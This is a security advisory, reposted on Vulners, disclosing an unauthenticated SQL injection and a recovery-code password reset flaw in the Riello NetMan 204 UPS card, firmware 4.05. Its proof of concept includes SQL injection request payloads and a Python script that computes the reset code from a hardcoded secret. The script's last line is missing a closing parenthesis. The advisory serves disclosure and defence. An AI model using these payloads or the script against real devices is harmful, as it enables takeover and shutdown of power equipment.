Vulners
Lucene search
Netman 204 4.05 SQL Injection / Unauthenticated Password Reset Vulnerabilities
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | CVE-2024-8877 | 25 Sep 202404:16 | – | circl |
| CVE-2024-8878 | 25 Sep 202404:16 | – | circl |
 | RIELLO UPS NetMan SQL注入漏洞 | 25 Sep 202400:00 | – | cnnvd |
| RIELLO UPS NetMan SQL注入漏洞 | 25 Sep 202400:00 | – | cnnvd |
 | CVE-2024-8877 | 24 Sep 202415:19 | – | cve |
| CVE-2024-8878 | 24 Sep 202415:14 | – | cve |
 | CVE-2024-8877 SQL Injection | 24 Sep 202415:19 | – | cvelist |
| CVE-2024-8878 Unauthenticated Password Reset | 24 Sep 202415:14 | – | cvelist |
 | EUVD-2024-49451 | 3 Oct 202520:07 | – | euvd |
 | Riello Netman 204 - SQL Injection | 9 Jun 202605:43 | – | nuclei |
10
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Netman 204
vulnerable version| 4.05
fixed version| -
CVE number| CVE-2024-8877, CVE-2024-8878
impact| High
homepage| https://www.riello-ups.com/
found| 2024-05-17
by| D. Blagojevic (Office Vienna)
| S. Dietz (Office Vienna)
| T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"Riello Elettronica, lead by Cav. Lav. Pierantonio Riello, has a presence today
in the Electrical manufacturing industry with two divisions: Energy, Automation
and Security. It is a leader in the Uninterruptible Power Supply market with
the well-known brand Riello UPS.
Energy represents the Group’s core business, in particular with the manufacture
of UPS that are firstly able to guarantee the quality of electricity and
secondly maintain normal operation and continuity in case of blackouts or
anomalies in the energy supply.
Riello UPS designs and produces strategical solutions for every kind of
requirement and make a bespoke offering according to the clients’ needs: from
banks to the hospitals, transport to infrastructures, from domestic use to data
centres."
Source: https://www.riello-ups.com/pages/41-the-riello-elettronica-group
Vulnerable versions
-------------------------------------------------------------------------------
NetMan 204 / 4.05
Vulnerability overview
-------------------------------------------------------------------------------
1) SQL Injection (CVE-2024-8877)
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and
/cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior
authentication. This enables an attacker to modify the collected log data in an
arbitrary way.
2) Unauthenticated Password Reset (CVE-2024-8878)
By navigating to the endpoint /recoverpassword.html an attacker can gather the
netmanid from the UPS. This id can be used to calculate the recovery code for
resetting the password. This way enables an attacker to take over control of
the UPS and e.g. turn it off.
Proof of Concept
-------------------------------------------------------------------------------
1) SQL Injection (CVE-2024-8877)
The system is subsceptible to SQL injections, which is illustrated by the
following payloads:
AND 1=0:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&
gravity=%25&type=%25%27and/**/%271%27=%270
AND 1=1:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&
gravity=%25&type=%25%27and/**/%271%27=%271
The first request does not return any data, while the second request returns
all entries with a start and end date in the given interval.
2) Unauthenticated Password Reset (CVE-2024-8878)
The following python script can be used to generate the recovery code from the
netmanid:
import hashlib
import sys
def calc_code(netman_id):
secret = b"NMP"
netman_id = secret + netman_id[3:]
round1 = hashlib.md5(netman_id).hexdigest().encode('utf-8')
round2 = hashlib.sha1(round1).hexdigest()
code = round2[5:5+7]
return code
if len(sys.argv) < 2:
sys.exit("usage: {} netman_id".format(sys.argv[0]))
netman_id = sys.argv[1]
print(calc_code(netman_id.encode('utf-8'))
Inputting the recovery code in /recoverpassword.html resets the login
credentials to admin:admin.
Solution
-------------------------------------------------------------------------------
None
Workaround
-------------------------------------------------------------------------------
Limit access to the device.
Recommendation
-------------------------------------------------------------------------------
Riello should release a firmware update that fixes the mentioned
vulnerabilities.
Customers should not use this device in productive networks.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Sep 2024 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 410
CVSS 3.19.8
EPSS0.83804
SSVC